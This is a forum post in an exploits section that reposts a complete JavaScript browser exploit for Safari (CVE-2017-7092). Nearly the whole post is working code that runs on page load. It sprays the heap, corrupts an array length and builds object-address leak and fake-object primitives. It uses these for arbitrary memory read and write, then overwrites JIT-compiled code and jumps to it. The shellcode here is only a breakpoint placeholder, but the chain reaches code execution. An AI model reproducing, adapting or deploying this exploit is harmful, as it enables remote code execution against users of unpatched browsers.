Jump to content
Nytro

Safari CVE-2017-7092-Exploit

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted 
<html>
<head>
    <script>
    // b JavaScriptCore`JSC::CopiedSpace::didStartFullCollection() + 218
    big_array = [];
    debug = 0;
    arr = [];
    evil_buffer = {};
    bigarray_buffer_index = 0;
    buffer_arr_index = 0;
    function_to_shellcode = {}
    function log(txt) {
        var c = document.createElement("div");
        c.innerHTML = "log: " + txt;
        d.appendChild(c);
    }
    function debug_alert(str){
        if(debug){
            alert(str);
            log(str);
        }
    }
    function gc() {
        debug_alert("gc");
        for(i = 0;i < 0x924924;i++){   //0x4924924
            arr[i] = new ArrayBuffer(20);  //54
        }
        debug_alert("gcc");
    }
    function gc2() {
        try {
            var c = document.createElement("canvas");
            var gl = c.getContext("2d");
            for (var i = 0; i < 100; i++) {
                var gggg = gl.createImageData(1, 0x10000/4)
            }
        } catch (e) {
        }
    }
    function make_a_big_hole(){
        g = []
        gg = "g".repeat(0x7fff1000)
        debug_alert("big_hole");
        for(var i = 0; i < 5;i++){
            g[i] = String.prototype.fontsize.call(gg,5);
        }
        debug_alert("after_big_hole");
        for(var i = 0; i < 0x3;i++){
            g[0] = null;  //gc
            //g[1] = null;
            g[2] = null;   //".replace
            g[3] = null;   //hole
        }
        //g = null;
        debug_alert("big_array");
        init_big_array_len = 0x10000000;
        g[2] = new Array(init_big_array_len);
        g[2].fill(1.1);
        debug_alert("after_big_array");
        big_array = g[2];
        //evil_float64 = new Float64Array(new ArrayBuffer(0x7ffffff0));
        //arr2 = []; arr2[0] = evil_float64;
        //heap_feng_shui();
        gg = null;
        gc();
    }
    function make_evil_data(){
        nop = "\x00"
        nop_data = ""
        offset = 0x38 + 0x1e +0x38
        nop_data = nop.repeat(offset/2);
        //nop_data = nop_data + "\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff"
        nop_data = nop_data + unescape("%uffff%uffff%uffff%uffff") + "\x00\x00\x00\x00" + unescape("%uffff%uffff%uffff%uffff");
        ff = "\x00"
        ff_data = ff.repeat((0x1000-offset-0x18)/2);
        return nop_data + ff_data;
    }
    function heap_feng_shui(){
        debug_alert("heap_feng_shui");
        arr2 = []
        buffer_arr = []
       /* for(var i = 0;i < 20;i++){
            //arr2[i] = new Array(0x1000);
            buffer_arr[i] = new Float64Array(0x2000001);
           // buffer_arr[i].fill(1.1);  //float64  1.1   ==  array   1.0375
        }*/
        for(var i = 0;i < 0x18000;i++){
            evil_float64 = new Float64Array(new ArrayBuffer(0x8000));
            evil_float64.fill(1.1);
            buffer_arr[i] = evil_float64;
        }
        debug_alert("after_heap_feng_shui");
    }
    function f64tou32(number){
        a = new Float64Array(0x8);
        a.fill(number);
        b = new Uint32Array(a.buffer);
        result = [];
        result[0] = b[0];
        result[1] = b[1];
        return result;
    }
    function u32tof64(arr){
        b = new Uint32Array(0x8);
        b[1] = arr[1];
        b[0] = arr[0];
        a = new Float64Array(b.buffer);
        return a[0];
    }
    function read_obj(obj){
        big_array[bigarray_buffer_index] = obj;
        f64_address = buffer_arr[buffer_arr_index][0x50/8];
        uint32 = f64tou32(f64_address);
       // alert(uint32[1].toString(16)+ "  " + uint32[0].toString(16));
        return uint32;
        //alert(uint32[1].toString(16)+ "  " + uint32[0].toString(16));
    }
    function fake_obj(arr_address){
        f64_address = u32tof64(arr_address);
       // alert(f64_address);
        buffer_arr[buffer_arr_index][0x50/8] = f64_address;
       // alert("here");
        return big_array[bigarray_buffer_index];
    }
    function randomString(){
        chars = "abcdefghijklmnopq";
        maxPos = chars.length;
        result = "";
        for(i = 0;i < 0x8;i++){
            result += chars.charAt(Math.floor(Math.random() * maxPos));
        }
        return result;
    }
    function sprayFloat64ArrayStru(){
        for(var i = 0; i < 0x1000;i++){
            var a = new Float64Array(1);
            a[randomString()] = 1337;
        }
    }
    function Int64(arr){
        uint32 = [];
        uint32[0] = arr[0];
        uint32[1] = arr[1] - 0x10000;
        f = u32tof64(uint32);
        return f;
    }
    function Int64_add(arr,num){
        arr[0] = arr[0] + num;
        return arr;
    }
    function read_64(addr){
        f = u32tof64(addr);
        fakearray[0x2] = f;
        result = [];
        result[0] = evil_buffer_array[0];
        result[1] = evil_buffer_array[1];
        //alert(result[1].toString(16)+ "  " + result[0].toString(16));
        return result;
    }
    function write_32(addr,data){
        f = u32tof64(addr);
        fakearray[0x2] = f;
        evil_buffer_array[0] = data;
    }
    function make_jit_function(){
        func_body = "eval('');abc = [];"
        for(i = 0;i<500;i++){
            func_body += "abc[" + i.toString() + "];"
        }
        function_to_shellcode = new Function("a",func_body);
        // alert("here")
        for(i = 0;i < 100; i++){
            function_to_shellcode();
        }
        // alert("here")
    }
    function trigger() {
        //alert(2);
       // make_jit_function();
        evil_data = make_evil_data();
        a = evil_data.repeat(0x7fff0000/0x800);
        z = a.slice(1);
        x = "\"".repeat(0x2aaaaaa0);
        //alert("1");
      //  alert(evil_data.length.toString(16));
        
        make_a_big_hole();
        z = String.prototype.link.call(a,x)
        alert("The Array length is 0x" + big_array.length.toString(16));
        heap_feng_shui();
        //z = null;
        //a = null;
        //x = null;
       // heap_feng_shui();
        //alert("end");
        
        //Array.prototype.slice.call(arr,1);
        //Array.prototype.slice.call(buffer_arr,1);
        t = Array.prototype.slice.call(big_array,0x10000001,0x10000002);
        t = Array.prototype.slice.call(buffer_arr,1,2);
        if(big_array.length != init_big_array_len){
           // alert("Success!The Array length is 0x" + big_array.length.toString(16));
           // alert(big_array[0x1]);
            /*for(var i = 0x10000000;i < big_array.length;i++){
                if(big_array[i] != undefined  && big_array[i] != -1){
                    alert(i.toString(16));
                    alert(big_array[i]);
                }
            }*/
            flag = 0;
            for(var i = 0x35000000;i < 0x4a000000;i=i+0x2000){  //0x4a000000
                //alert(i.toString(16));
                if(big_array[i] == 1.0375){
                    alert("find Success");
                    bigarray_buffer_index = i;
                    big_array[bigarray_buffer_index] = 3.3333333;
                    j = 0;
                    while(j<0x18000){
                        if(buffer_arr[j][0x50/8] != 1.1){
                            buffer_arr_index = j;
                            flag = 1;
                            break;
                        }
                        j++;
                    }
                    break;
                }
            }
            if(flag == 0){
                alert("can't find buffer!");
                window.location.reload();
            }
        }
        else{
            alert("can't overwrite the length!");
            window.location.reload();
        }
        //alert(buffer_arr_index);  
        make_jit_function();
        sprayFloat64ArrayStru();
        evil_buffer_array = new Uint32Array(0x1000);
        var jsCellHeader = Int64([0x00001000,0x11827000]);
        var lengthFlags = Int64([0x00000010,0x00010000]);
        var container = {
            jsCell : jsCellHeader,
            butterfly : false,
            vector : evil_buffer_array,
            lengthAndFlags : lengthFlags
        };
        address = Int64_add(read_obj(container),0x10);
        //alert(address[1].toString(16) + "  " + address[0].toString(16));
        fakearray = fake_obj(address);
        //String.prototype.link.call(container);
        while(!(fakearray instanceof Float64Array)){
            i = 1;
            jsCellHeader = Int64([0x00001000+i,0x11827000]);
            container.jsCell = jsCellHeader;
            i++;
        }
        //String.prototype.link.call(fakearray);
       
        
        func_addr = read_obj(function_to_shellcode);
       // alert(func_addr[1].toString(16)+ "  " + func_addr[0].toString(16));
        executableAddr = read_64(Int64_add(func_addr,0x18));
        jitCodeAddr = read_64(Int64_add(executableAddr,0x18));
        codeAddr = read_64(Int64_add(jitCodeAddr,0x20));
        write_32(codeAddr,0xcccccccc);
        //codeAddr = read_64(Int64_add(jitCodeAddr,0x10));
        //write_32(codeAddr,0xcccccccc);
        alert("begin_shellcode!!!!!!");
        function_to_shellcode();
        alert("end");
        
    }
    </script>
</head>
<body onload="trigger()">
<pre id="d">
</pre>
</body>
</html>

Sursa: https://github.com/xuechiyaobai/CVE-2017-7092-Exploit

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...